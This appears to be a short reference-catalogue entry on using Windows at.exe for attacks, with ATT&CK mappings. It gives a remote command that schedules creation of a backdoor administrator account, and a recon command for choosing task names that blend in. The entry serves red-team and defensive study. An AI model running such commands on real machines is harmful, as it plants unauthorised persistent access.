.. / at.exe

Schedules commands and programs to run on a computer at a specified time and date


Functions:
Type:
Toolsets:

Execute

Execute task

at.exe \\W10.ad.bitsadmin.com 06:00 cmd /c "net user Hacker H4ck#rt /add & net localgroup Administrators Hacker /add"
Usecase
Create backdoor user or launch implant

Comments
Deprecated in favor of schtasks.exe

Mitre Att&ck
T1053.002


Recon

List tasks

at.exe \\W10.ad.bitsadmin.com
Usecase
List current tasks to identify a name that can be used for a new task to blend in

Mitre Att&ck
T1053.002




Updated: 2023-11-04
Contributor: Arris Huijgen (bitsadmin)